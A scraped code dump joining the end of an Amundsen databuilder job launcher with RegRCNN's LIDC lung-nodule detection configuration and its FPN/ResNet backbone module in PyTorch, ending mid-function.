if self.scoped_conf.get_bool(DefaultJob.IS_STATSD_ENABLED, False):
prefix = 'amundsen.databuilder.job.{}'.format(self.scoped_conf.get_string(DefaultJob.JOB_IDENTIFIER))
LOGGER.info('Setting statsd for job metrics with prefix: {}'.format(prefix))
self.statsd = StatsClient(prefix=prefix)
else:
self.statsd = None
def init(self, conf):
# type: (ConfigTree) -> None
pass
def _init(self):
# type: () -> None
task_conf = Scoped.get_scoped_conf(self.conf, self.task.get_scope())
self.task.init(task_conf.with_fallback(self.conf))
def launch(self):
# type: () -> None
"""
Launch a job by initializing job, run task and publish
:return:
"""
logging.info('Launching a job')
# Using nested try finally to make sure task get closed as soon as possible as well as to guarantee all the
# closeable get closed.
try:
is_success = True
self._init()
try:
self.task.run()
finally:
self.task.close()
self.publisher.init(Scoped.get_scoped_conf(self.conf, self.publisher.get_scope()))
Job.closer.register(self.publisher.close)
self.publisher.publish()
except Exception as e:
is_success = False
raise e
finally:
# TODO: If more metrics are needed on different construct, such as task, consider abstracting this out
if self.statsd:
if is_success:
LOGGER.info('Publishing job metrics for success')
self.statsd.incr('success')
else:
LOGGER.info('Publishing job metrics for failure')
self.statsd.incr('fail')
Job.closer.close()
logging.info('Job completed')
``` |
{
"source": "jinhyun95/RegRCNN",
"score": 2
} |
#### File: datasets/lidc/configs.py
```python
import sys
import os
from collections import namedtuple
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
import numpy as np
sys.path.append(os.path.dirname(os.path.realpath(__file__))+"/../..")
from default_configs import DefaultConfigs
# legends, nested classes are not handled well in multiprocessing! hence, Label class def in outer scope
Label = namedtuple("Label", ['id', 'name', 'color', 'm_scores']) # m_scores = malignancy scores
binLabel = namedtuple("binLabel", ['id', 'name', 'color', 'm_scores', 'bin_vals'])
class Configs(DefaultConfigs):
def __init__(self, server_env=None):
super(Configs, self).__init__(server_env)
#########################
# Preprocessing #
#########################
self.root_dir = '/data/public/rw/LIDC_IDRI/'
self.raw_data_dir = '{}/new_nrrds'.format(self.root_dir)
self.pp_dir = '{}/new_pp_norm'.format(self.root_dir)
# 'merged' for one gt per image, 'single_annotator' for four gts per image.
self.gts_to_produce = ["merged"]
self.target_spacing = (0.7, 0.7, 1.25)
#########################
# I/O #
#########################
# path to preprocessed data.
self.pp_name = 'lidc_reg'
self.input_df_name = 'info_df.pickle'
self.data_sourcedir = '/data/public/rw/{}/'.format(self.pp_name)
# settings for deployment on cluster.
if server_env:
# path to preprocessed data.
self.data_sourcedir = '/data/public/rw/{}/'.format(self.pp_name)
# one out of ['mrcnn', 'retina_net', 'retina_unet', 'detection_fpn', 'ours'].
self.model = 'ours'
self.model_path = 'models/{}.py'.format(self.model if not 'retina' in self.model else 'retina_net')
self.model_path = os.path.join(self.source_dir, self.model_path)
#########################
# Architecture #
#########################
# dimension the model operates in. one out of [2, 3].
self.dim = 2
# 'class': standard object classification per roi, pairwise combinable with each of below tasks.
# if 'class' is omitted from tasks, object classes will be fg/bg (1/0) from RPN.
# 'regression': regress some vector per each roi
# 'regression_ken_gal': use kendall-gal uncertainty sigma
# 'regression_bin': classify each roi into a bin related to a regression scale
self.prediction_tasks = ['class']
self.start_filts = 48 if self.dim == 2 else 18
self.end_filts = self.start_filts * 4 if self.dim == 2 else self.start_filts * 2
self.res_architecture = 'resnet50' # 'resnet101' , 'resnet50'
self.norm = 'batch_norm' # one of None, 'instance_norm', 'batch_norm'
# one of 'xavier_uniform', 'xavier_normal', or 'kaiming_normal', None (=default = 'kaiming_uniform')
self.weight_init = None
self.regression_n_features = 1
#########################
# Data Loader #
#########################
# distorted gt experiments: train on single-annotator gts in a random fashion to investigate network's
# handling of noisy gts.
# choose 'merged' for single, merged gt per image, or 'single_annotator' for four gts per image.
# validation is always performed on same gt kind as training, testing always on merged gt.
self.training_gts = "merged"
# select modalities from preprocessed data
self.channels = [0]
self.n_channels = len(self.channels)
# patch_size to be used for training. pre_crop_size is the patch_size before data augmentation.
self.pre_crop_size_2D = [320, 320]
self.patch_size_2D = [320, 320]
self.pre_crop_size_3D = [160, 160, 96]
self.patch_size_3D = [160, 160, 96]
self.patch_size = self.patch_size_2D if self.dim == 2 else self.patch_size_3D
self.pre_crop_size = self.pre_crop_size_2D if self.dim == 2 else self.pre_crop_size_3D
# ratio of free sampled batch elements before class balancing is triggered
# (>0 to include "empty"/background patches.)
self.batch_random_ratio = 0.3
self.balance_target = "class_targets" if 'class' in self.prediction_tasks else 'rg_bin_targets'
# set 2D network to match 3D gt boxes.
self.merge_2D_to_3D_preds = self.dim==2
self.observables_rois = []
#self.rg_map = {1:1, 2:2, 3:3, 4:4, 5:5}
#########################
# Colors and Legends #
#########################
self.plot_frequency = 5
binary_cl_labels = [Label(1, 'benign', (*self.dark_green, 1.), (1, 2)),
Label(2, 'malignant', (*self.red, 1.), (3, 4, 5))]
quintuple_cl_labels = [Label(1, 'MS1', (*self.dark_green, 1.), (1,)),
Label(2, 'MS2', (*self.dark_yellow, 1.), (2,)),
Label(3, 'MS3', (*self.orange, 1.), (3,)),
Label(4, 'MS4', (*self.bright_red, 1.), (4,)),
Label(5, 'MS5', (*self.red, 1.), (5,))]
# choose here if to do 2-way or 5-way regression-bin classification
task_spec_cl_labels = quintuple_cl_labels
self.class_labels = [
# #id #name #color #malignancy score
Label( 0, 'bg', (*self.gray, 0.), (0,))]
if "class" in self.prediction_tasks:
self.class_labels += task_spec_cl_labels
else:
self.class_labels += [Label(1, 'lesion', (*self.orange, 1.), (1,2,3,4,5))]
if any(['regression' in task for task in self.prediction_tasks]):
self.bin_labels = [binLabel(0, 'MS0', (*self.gray, 1.), (0,), (0,))]
self.bin_labels += [binLabel(cll.id, cll.name, cll.color, cll.m_scores,
tuple([ms for ms in cll.m_scores])) for cll in task_spec_cl_labels]
self.bin_id2label = {label.id: label for label in self.bin_labels}
self.ms2bin_label = {ms: label for label in self.bin_labels for ms in label.m_scores}
bins = [(min(label.bin_vals), max(label.bin_vals)) for label in self.bin_labels]
self.bin_id2rg_val = {ix: [np.mean(bin)] for ix, bin in enumerate(bins)}
self.bin_edges = [(bins[i][1] + bins[i + 1][0]) / 2 for i in range(len(bins) - 1)]
if self.class_specific_seg:
self.seg_labels = self.class_labels
else:
self.seg_labels = [ # id #name #color
Label(0, 'bg', (*self.gray, 0.)),
Label(1, 'fg', (*self.orange, 1.))
]
self.class_id2label = {label.id: label for label in self.class_labels}
self.class_dict = {label.id: label.name for label in self.class_labels if label.id != 0}
# class_dict is used in evaluator / ap, auc, etc. statistics, and class 0 (bg) only needs to be
# evaluated in debugging
self.class_cmap = {label.id: label.color for label in self.class_labels}
self.seg_id2label = {label.id: label for label in self.seg_labels}
self.cmap = {label.id: label.color for label in self.seg_labels}
self.plot_prediction_histograms = True
self.plot_stat_curves = False
self.has_colorchannels = False
self.plot_class_ids = True
self.num_classes = len(self.class_dict) # for instance classification (excl background)
self.num_seg_classes = len(self.seg_labels) # incl background
#########################
# Data Augmentation #
#########################
self.da_kwargs={
'mirror': True,
'mirror_axes': tuple(np.arange(0, self.dim, 1)),
'do_elastic_deform': True,
'alpha':(0., 1500.),
'sigma':(30., 50.),
'do_rotation':True,
'angle_x': (0., 2 * np.pi),
'angle_y': (0., 0),
'angle_z': (0., 0),
'do_scale': True,
'scale':(0.8, 1.1),
'random_crop':False,
'rand_crop_dist': (self.patch_size[0] / 2. - 3, self.patch_size[1] / 2. - 3),
'border_mode_data': 'constant',
'border_cval_data': 0,
'order_data': 1}
if self.dim == 3:
self.da_kwargs['do_elastic_deform'] = False
self.da_kwargs['angle_x'] = (0, 0.0)
self.da_kwargs['angle_y'] = (0, 0.0) #must be 0!!
self.da_kwargs['angle_z'] = (0., 2 * np.pi)
#################################
# Schedule / Selection / Optim #
#################################
self.num_epochs = 130 if self.dim == 2 else 150
self.num_train_batches = 200 if self.dim == 2 else 200
self.batch_size = 20 if self.dim == 2 else 8
# decide whether to validate on entire patient volumes (like testing) or sampled patches (like training)
# the former is morge accurate, while the latter is faster (depending on volume size)
self.val_mode = 'val_sampling' # only 'val_sampling', 'val_patient' not implemented
if self.val_mode == 'val_patient':
raise NotImplementedError
if self.val_mode == 'val_sampling':
self.num_val_batches = 70
self.save_n_models = 4
# set a minimum epoch number for saving in case of instabilities in the first phase of training.
self.min_save_thresh = 0 if self.dim == 2 else 0
# criteria to average over for saving epochs, 'criterion':weight.
if "class" in self.prediction_tasks:
# 'criterion': weight
if len(self.class_labels)==3:
self.model_selection_criteria = {"benign_ap": 0.5, "malignant_ap": 0.5}
elif len(self.class_labels)==6:
self.model_selection_criteria = {str(label.name)+"_ap": 1./5 for label in self.class_labels if label.id!=0}
elif any("regression" in task for task in self.prediction_tasks):
self.model_selection_criteria = {"lesion_ap": 0.2, "lesion_avp": 0.8}
self.weight_decay = 0
self.clip_norm = 200 if 'regression_ken_gal' in self.prediction_tasks else None # number or None
# int in [0, dataset_size]. select n patients from dataset for prototyping. If None, all data is used.
self.select_prototype_subset = None #self.batch_size
#########################
# Testing #
#########################
# set the top-n-epochs to be saved for temporal averaging in testing.
self.test_n_epochs = self.save_n_models
self.test_aug_axes = (0,1,(0,1)) # None or list: choices are 0,1,(0,1) (0==spatial y, 1== spatial x).
self.held_out_test_set = False
self.max_test_patients = "all" # "all" or number
self.report_score_level = ['rois', 'patient'] # choose list from 'patient', 'rois'
self.patient_class_of_interest = 2 if 'class' in self.prediction_tasks else 1
self.metrics = ['ap', 'auc']
if any(['regression' in task for task in self.prediction_tasks]):
self.metrics += ['avp', 'rg_MAE_weighted', 'rg_MAE_weighted_tp',
'rg_bin_accuracy_weighted', 'rg_bin_accuracy_weighted_tp']
if 'aleatoric' in self.model:
self.metrics += ['rg_uncertainty', 'rg_uncertainty_tp', 'rg_uncertainty_tp_weighted']
self.evaluate_fold_means = True
self.ap_match_ious = [0.1] # list of ious to be evaluated for ap-scoring.
self.min_det_thresh = 0.1 # minimum confidence value to select predictions for evaluation.
# aggregation method for test and val_patient predictions.
# wbc = weighted box clustering as in https://arxiv.org/pdf/1811.08661.pdf,
# nms = standard non-maximum suppression, or None = no clustering
self.clustering = 'wbc'
# iou thresh (exclusive!) for regarding two preds as concerning the same ROI
self.clustering_iou = 0.1 # has to be larger than desired possible overlap iou of model predictions
self.plot_prediction_histograms = True
self.plot_stat_curves = False
self.n_test_plots = 1
#########################
# Assertions #
#########################
if not 'class' in self.prediction_tasks:
assert self.num_classes == 1
#########################
# Add model specifics #
#########################
{'detection_fpn': self.add_det_fpn_configs,
'mrcnn': self.add_mrcnn_configs, 'mrcnn_aleatoric': self.add_mrcnn_configs,
'retina_net': self.add_mrcnn_configs,
'retina_unet': self.add_mrcnn_configs,
}[self.model]()
def rg_val_to_bin_id(self, rg_val):
return float(np.digitize(np.mean(rg_val), self.bin_edges))
def add_det_fpn_configs(self):
self.learning_rate = [1e-4] * self.num_epochs
self.dynamic_lr_scheduling = False
# RoI score assigned to aggregation from pixel prediction (connected component). One of ['max', 'median'].
self.score_det = 'max'
# max number of roi candidates to identify per batch element and class.
self.n_roi_candidates = 10 if self.dim == 2 else 30
# loss mode: either weighted cross entropy ('wce'), batch-wise dice loss ('dice), or the sum of both ('dice_wce')
self.seg_loss_mode = 'wce'
# if <1, false positive predictions in foreground are penalized less.
self.fp_dice_weight = 1 if self.dim == 2 else 1
if len(self.class_labels)==3:
self.wce_weights = [1., 1., 1.] if self.seg_loss_mode=="dice_wce" else [0.1, 1., 1.]
elif len(self.class_labels)==6:
self.wce_weights = [1., 1., 1., 1., 1., 1.] if self.seg_loss_mode == "dice_wce" else [0.1, 1., 1., 1., 1., 1.]
else:
raise Exception("mismatch loss weights & nr of classes")
self.detection_min_confidence = self.min_det_thresh
self.head_classes = self.num_seg_classes
def add_mrcnn_configs(self):
# learning rate is a list with one entry per epoch.
self.learning_rate = [1e-4] * self.num_epochs
self.dynamic_lr_scheduling = False
# disable the re-sampling of mask proposals to original size for speed-up.
# since evaluation is detection-driven (box-matching) and not instance segmentation-driven (iou-matching),
# mask-outputs are optional.
self.return_masks_in_train = False
self.return_masks_in_val = True
self.return_masks_in_test = False
# set number of proposal boxes to plot after each epoch.
self.n_plot_rpn_props = 5 if self.dim == 2 else 30
# number of classes for network heads: n_foreground_classes + 1 (background)
self.head_classes = self.num_classes + 1
self.frcnn_mode = False
# feature map strides per pyramid level are inferred from architecture.
self.backbone_strides = {'xy': [4, 8, 16, 32], 'z': [1, 2, 4, 8]}
# anchor scales are chosen according to expected object sizes in data set. Default uses only one anchor scale
# per pyramid level. (outer list are pyramid levels (corresponding to BACKBONE_STRIDES), inner list are scales per level.)
self.rpn_anchor_scales = {'xy': [[8], [16], [32], [64]], 'z': [[2], [4], [8], [16]]}
# choose which pyramid levels to extract features from: P2: 0, P3: 1, P4: 2, P5: 3.
self.pyramid_levels = [0, 1, 2, 3]
# number of feature maps in rpn. typically lowered in 3D to save gpu-memory.
self.n_rpn_features = 512 if self.dim == 2 else 128
# anchor ratios and strides per position in feature maps.
self.rpn_anchor_ratios = [0.5, 1, 2]
self.rpn_anchor_stride = 1
# Threshold for first stage (RPN) non-maximum suppression (NMS): LOWER == HARDER SELECTION
self.rpn_nms_threshold = 0.7 if self.dim == 2 else 0.7
# loss sampling settings.
self.rpn_train_anchors_per_image = 6 #per batch element
self.train_rois_per_image = 6 #per batch element
self.roi_positive_ratio = 0.5
self.anchor_matching_iou = 0.7
# factor of top-k candidates to draw from per negative sample (stochastic-hard-example-mining).
# poolsize to draw top-k candidates from will be shem_poolsize * n_negative_samples.
self.shem_poolsize = 10
self.pool_size = (7, 7) if self.dim == 2 else (7, 7, 3)
self.mask_pool_size = (14, 14) if self.dim == 2 else (14, 14, 5)
self.mask_shape = (28, 28) if self.dim == 2 else (28, 28, 10)
self.rpn_bbox_std_dev = np.array([0.1, 0.1, 0.1, 0.2, 0.2, 0.2])
self.bbox_std_dev = np.array([0.1, 0.1, 0.1, 0.2, 0.2, 0.2])
self.window = np.array([0, 0, self.patch_size[0], self.patch_size[1], 0, self.patch_size_3D[2]])
self.scale = np.array([self.patch_size[0], self.patch_size[1], self.patch_size[0], self.patch_size[1],
self.patch_size_3D[2], self.patch_size_3D[2]])
if self.dim == 2:
self.rpn_bbox_std_dev = self.rpn_bbox_std_dev[:4]
self.bbox_std_dev = self.bbox_std_dev[:4]
self.window = self.window[:4]
self.scale = self.scale[:4]
# pre-selection in proposal-layer (stage 1) for NMS-speedup. applied per batch element.
self.pre_nms_limit = 3000 if self.dim == 2 else 6000
# n_proposals to be selected after NMS per batch element. too high numbers blow up memory if "detect_while_training" is True,
# since proposals of the entire batch are forwarded through second stage in as one "batch".
self.roi_chunk_size = 2500 if self.dim == 2 else 600
self.post_nms_rois_training = 500 if self.dim == 2 else 75
self.post_nms_rois_inference = 500
# Final selection of detections (refine_detections)
self.model_max_instances_per_batch_element = 10 if self.dim == 2 else 30 # per batch element and class.
self.detection_nms_threshold = 1e-5 # needs to be > 0, otherwise all predictions are one cluster.
self.model_min_confidence = 0.1
if self.dim == 2:
self.backbone_shapes = np.array(
[[int(np.ceil(self.patch_size[0] / stride)),
int(np.ceil(self.patch_size[1] / stride))]
for stride in self.backbone_strides['xy']])
else:
self.backbone_shapes = np.array(
[[int(np.ceil(self.patch_size[0] / stride)),
int(np.ceil(self.patch_size[1] / stride)),
int(np.ceil(self.patch_size[2] / stride_z))]
for stride, stride_z in zip(self.backbone_strides['xy'], self.backbone_strides['z']
)])
if self.model == 'retina_net' or self.model == 'retina_unet':
self.focal_loss = True
# implement extra anchor-scales according to retina-net publication.
self.rpn_anchor_scales['xy'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in
self.rpn_anchor_scales['xy']]
self.rpn_anchor_scales['z'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in
self.rpn_anchor_scales['z']]
self.n_anchors_per_pos = len(self.rpn_anchor_ratios) * 3
self.n_rpn_features = 256 if self.dim == 2 else 128
# pre-selection of detections for NMS-speedup. per entire batch.
self.pre_nms_limit = (500 if self.dim == 2 else 6250) * self.batch_size
# anchor matching iou is lower than in Mask R-CNN according to https://arxiv.org/abs/1708.02002
self.anchor_matching_iou = 0.5
if self.model == 'retina_unet':
self.operate_stride1 = True
elif self.model == 'ours':
# implement extra anchor-scales according to retina-net publication.
self.rpn_anchor_scales['xy'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in
self.rpn_anchor_scales['xy']]
self.rpn_anchor_scales['z'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in
self.rpn_anchor_scales['z']]
self.n_anchors_per_pos = len(self.rpn_anchor_ratios) * 3
self.n_rpn_features = 256 if self.dim == 2 else 128
# pre-selection of detections for NMS-speedup. per entire batch.
self.pre_nms_limit = (500 if self.dim == 2 else 6250) * self.batch_size
# anchor matching iou is lower than in Mask R-CNN according to https://arxiv.org/abs/1708.02002
self.anchor_matching_iou = 0.5
```
#### File: RegRCNN/models/backbone.py
```python
import torch.nn as nn
import torch.nn.functional as F
import torch
class ConvGenerator():
"""conv-layer generator to avoid 2D vs. 3D distinction in code.
"""
def __init__(self, dim):
self.dim = dim
def __call__(self, c_in, c_out, ks, pad=0, stride=1, norm=None, relu='relu'):
"""provides generic conv-layer modules for set dimension.
:param c_in: number of in_channels.
:param c_out: number of out_channels.
:param ks: kernel size.
:param pad: pad size.
:param stride: kernel stride.
:param norm: string specifying type of feature map normalization. If None, no normalization is applied.
:param relu: string specifying type of nonlinearity. If None, no nonlinearity is applied.
:return: 2D or 3D conv-layer module.
"""
if self.dim == 2:
module = nn.Conv2d(c_in, c_out, kernel_size=ks, padding=pad, stride=stride)
if norm is not None:
if norm == 'instance_norm':
norm_layer = nn.InstanceNorm2d(c_out)
elif norm == 'batch_norm':
norm_layer = nn.BatchNorm2d(c_out)
else:
raise ValueError('norm type as specified in configs is not implemented...')
module = nn.Sequential(module, norm_layer)
elif self.dim==3:
module = nn.Conv3d(c_in, c_out, kernel_size=ks, padding=pad, stride=stride)
if norm is not None:
if norm == 'instance_norm':
norm_layer = nn.InstanceNorm3d(c_out)
elif norm == 'batch_norm':
norm_layer = nn.BatchNorm3d(c_out)
else:
raise ValueError('norm type as specified in configs is not implemented... {}'.format(norm))
module = nn.Sequential(module, norm_layer)
else:
raise Exception("Invalid dimension {} in conv-layer generation.".format(self.dim))
if relu is not None:
if relu == 'relu':
relu_layer = nn.ReLU(inplace=True)
elif relu == 'leaky_relu':
relu_layer = nn.LeakyReLU(inplace=True)
else:
raise ValueError('relu type as specified in configs is not implemented...')
module = nn.Sequential(module, relu_layer)
return module
class Interpolate(nn.Module):
def __init__(self, scale_factor, mode):
super(Interpolate, self).__init__()
self.interp = nn.functional.interpolate
self.scale_factor = scale_factor
self.mode = mode
def forward(self, x):
x = self.interp(x, scale_factor=self.scale_factor, mode=self.mode, align_corners=False)
return x
class ResBlock(nn.Module):
def __init__(self, start_filts, planes, end_filts, conv, stride=1, identity_skip=True, norm=None, relu='relu'):
"""Builds a residual net block.
:param start_filts: #input channels to the block.
:param planes: #channels in block's hidden layers. set start_filts>planes<end_filts for bottlenecking.
:param end_filts: #output channels of the block.
:param conv: conv-layer generator.
:param stride:
:param identity_skip: whether to use weight-less identity on skip-connection if no rescaling necessary.
:param norm:
:param relu:
"""
super(ResBlock, self).__init__()
self.conv1 = conv(start_filts, planes, ks=1, stride=stride, norm=norm, relu=relu)
self.conv2 = conv(planes, planes, ks=3, pad=1, norm=norm, relu=relu)
self.conv3 = conv(planes, end_filts, ks=1, norm=norm, relu=None)
if relu == 'relu':
self.relu = nn.ReLU(inplace=True)
elif relu == 'leaky_relu':
self.relu = nn.LeakyReLU(inplace=True)
else:
raise Exception("Chosen activation {} not implemented.".format(self.relu))
if stride!=1 or start_filts!=end_filts or not identity_skip:
self.scale_residual = conv(start_filts, end_filts, ks=1, stride=stride, norm=norm, relu=None)
else:
self.scale_residual = None
def forward(self, x):
out = self.conv1(x)
out = self.conv2(out)
out = self.conv3(out)
if self.scale_residual:
residual = self.scale_residual(x)
else:
residual = x
out += residual
out = self.relu(out)
return out
class FPN(nn.Module):
"""
Feature Pyramid Network from https://arxiv.org/pdf/1612.03144.pdf with options for modifications.
by default is constructed with Pyramid levels P2, P3, P4, P5.
"""
def __init__(self, cf, conv, relu_enc="relu", relu_dec=None, operate_stride1=False):
"""
:param conv: instance of custom conv class containing the dimension info.
:param relu_enc: string specifying type of nonlinearity in encoder. If None, no nonlinearity is applied.
:param relu_dec: same as relu_enc but for decoder.
:param operate_stride1: boolean flag. enables adding of Pyramid levels P1 (output stride 2) and P0 (output stride 1).
from configs:
:param channels: len(channels) is nr of channel dimensions in input data.
:param start_filts: number of feature_maps in first layer. rest is scaled accordingly.
:param end_filts: number of feature_maps for output_layers of all levels in decoder.
:param res_architecture: string deciding whether to use "resnet50" or "resnet101".
:param norm: string specifying type of feature map normalization. If None, no normalization is applied.
:param sixth_pooling: boolean flag. enables adding of Pyramid level P6.
"""
super(FPN, self).__init__()
self.start_filts, sf = cf.start_filts, cf.start_filts #sf = alias for readability
self.out_channels = cf.end_filts
self.n_blocks = [3, 4, {"resnet50": 6, "resnet101": 23}[cf.res_architecture], 3]
self.block = ResBlock
self.block_exp = 4 #factor by which to increase nr of channels in first block layer.
self.relu_enc = relu_enc
self.relu_dec = relu_dec
self.operate_stride1 = operate_stride1
self.sixth_pooling = cf.sixth_pooling
if operate_stride1:
self.C0 = nn.Sequential(conv(len(cf.channels), sf, ks=3, pad=1, norm=cf.norm, relu=relu_enc),
conv(sf, sf, ks=3, pad=1, norm=cf.norm, relu=relu_enc))
self.C1 = conv(sf, sf, ks=7, stride=(2, 2, 1) if conv.dim == 3 else 2, pad=3, norm=cf.norm,
relu=relu_enc)
else:
self.C1 = conv(len(cf.channels), sf, ks=7, stride=(2, 2, 1) if conv.dim == 3 else 2, pad=3, norm=cf.norm,
relu=relu_enc)
C2_layers = []
C2_layers.append(nn.MaxPool2d(kernel_size=3, stride=2, padding=1) if
conv.dim == 2 else nn.MaxPool3d(kernel_size=3, stride=(2, 2, 1), padding=1))
C2_layers.append(self.block(sf, sf, sf*self.block_exp, conv=conv, stride=1, norm=cf.norm,
relu=relu_enc))
for i in range(1, self.n_blocks[0]):
C2_layers.append(self.block(sf*self.block_exp, sf, sf*self.block_exp, conv=conv,
stride=1, norm=cf.norm, relu=relu_enc))
self.C2 = nn.Sequential(*C2_layers)
C3_layers = []
C3_layers.append(self.block(sf*self.block_exp, sf*2, sf*self.block_exp*2, conv=conv,
stride=2, norm=cf.norm, relu=relu_enc))
for i in range(1, self.n_blocks[1]):
C3_layers.append(self.block(sf*self.block_exp*2, sf*2, sf*self.block_exp*2,
conv=conv, norm=cf.norm, relu=relu_enc))
self.C3 = nn.Sequential(*C3_layers)
C4_layers = []
C4_layers.append(self.block(sf*self.block_exp*2, sf*4, sf*self.block_exp*4,
conv=conv, stride=2, norm=cf.norm, relu=relu_enc))
for i in range(1, self.n_blocks[2]):
C4_layers.append(self.block(sf*self.block_exp*4, sf*4, sf*self.block_exp*4,
conv=conv, norm=cf.norm, relu=relu_enc))
self.C4 = nn.Sequential(*C4_layers)
C5_layers = []
C5_layers.append(self.block(sf*self.block_exp*4, sf*8, sf*self.block_exp*8,
conv=conv, stride=2, norm=cf.norm, relu=relu_enc))
for i in range(1, self.n_blocks[3]):
C5_layers.append(self.block(sf*self.block_exp*8, sf*8, sf*self.block_exp*8,
conv=conv, norm=cf.norm, relu=relu_enc))
self.C5 = nn.Sequential(*C5_layers)
if self.sixth_pooling:
C6_layers = []
C6_layers.append(self.block(sf*self.block_exp*8, sf*16, sf*self.block_exp*16,
conv=conv, stride=2, norm=cf.norm, relu=relu_enc))
for i in range(1, self.n_blocks[3]):
C6_layers.append(self.block(sf*self.block_exp*16, sf*16, sf*self.block_exp*16,
conv=conv, norm=cf.norm, relu=relu_enc))
self.C6 = nn.Sequential(*C6_layers)
if conv.dim == 2:
self.P1_upsample = Interpolate(scale_factor=2, mode='bilinear')
self.P2_upsample = Interpolate(scale_factor=2, mode='bilinear')
else:
self.P1_upsample = Interpolate(scale_factor=(2, 2, 1), mode='trilinear')
self.P2_upsample = Interpolate(scale_factor=(2, 2, 1), mode='trilinear')
if self.sixth_pooling:
self.P6_conv1 = conv(sf*self.block_exp*16, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P5_conv1 = conv(sf*self.block_exp*8, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P4_conv1 = conv(sf*self.block_exp*4, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P3_conv1 = conv(sf*self.block_exp*2, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P2_conv1 = conv(sf*self.block_exp, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P1_conv1 = conv(sf, self.out_channels, ks=1, stride=1, relu=relu_dec)
if operate_stride1:
self.P0_conv1 = conv(sf, self.out_channels, ks=1, stride=1, relu=relu_dec)
self.P0_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
self.P1_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
self.P2_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
self.P3_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
self.P4_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
self.P5_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
if self.sixth_pooling:
self.P6_conv2 = conv(self.out_channels, self.out_channels, ks=3, stride=1, pad=1, relu=relu_dec)
def forward(self, x):
"""
:param x: input image of shape (b, c, y, x, (z))
:return: list of output feature maps per pyramid level, each with shape (b, c, y, x, (z)).
"""
if self.operate_stride1:
c0_out = self.C0(x)
else:
c0_out = x
c1_out = self.C1(c0_out)
c2_out = self.C2(c1_out)
c3_out = self.C3(c2_out)
c4_out = self.C4(c3_out)
c5_out = self.C5(c4_out)
if self.sixth_pooling:
c6_out = self.C6(c5_out)
p6_pre_out = self.P6_conv1(c6_out)
p5_pre_out = self.P5_conv1(c5_out) + F.interpolate(p6_pre_out, scale_factor=2)
else:
p5_pre_out = self.P5_conv1(c5_out)
#pre_out means last step before prediction output
p4_pre_out = self.P4_conv1(c4_out) + F.interpolate(p5_pre_out, scale_factor=2)
p3_pre_out = self.P3_conv1(c3_out) + F.interpolate(p4_pre_out, scale_factor=2)
p2_pre_out = self.P2_conv1(c2_out) + F.interpolate(p3_pre_out, scale_factor=2)
# plot feature map shapes for debugging.
# for ii in [c0_out, c1_out, c2_out, c3_out, c4_out, c5_out, c6_out]:
# print ("encoder shapes:", ii.shape)
#
# for ii in [p6_out, p5_out, p4_out, p3_out, p2_out, p1_out]:
# print("decoder shapes:", ii.shape)
p2_out = self.P2_conv2(p2_pre_out)
p3_out = self.P3_conv2(p3_pre_out)
p4_out = self.P4_conv2(p4_pre_out)
p5_out = self.P5_conv2(p5_pre_out)
out_list = [p2_out, p3_out, p4_out, p5_out]
if self.sixth_pooling:
p6_out = self.P6_conv2(p6_pre_out)
out_list.append(p6_out)
if self.operate_stride1:
p1_pre_out = self.P1_conv1(c1_out) + self.P2_upsample(p2_pre_out)
p0_pre_out = self.P0_conv1(c0_out) + self.P1_upsample(p1_pre_out)
# p1_out = self.P1_conv2(p1_pre_out) # usually not needed.
p0_out = self.P0_conv2(p0_pre_out)
out_list = [p0_out] + out_list
return out_list
def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, groups=1,
base_width=64, dilation=1, norm_layer=None):
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
# Both self.conv2 and self.downsample layers downsample the input when stride != 1
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x)
out = self.bn1(out)
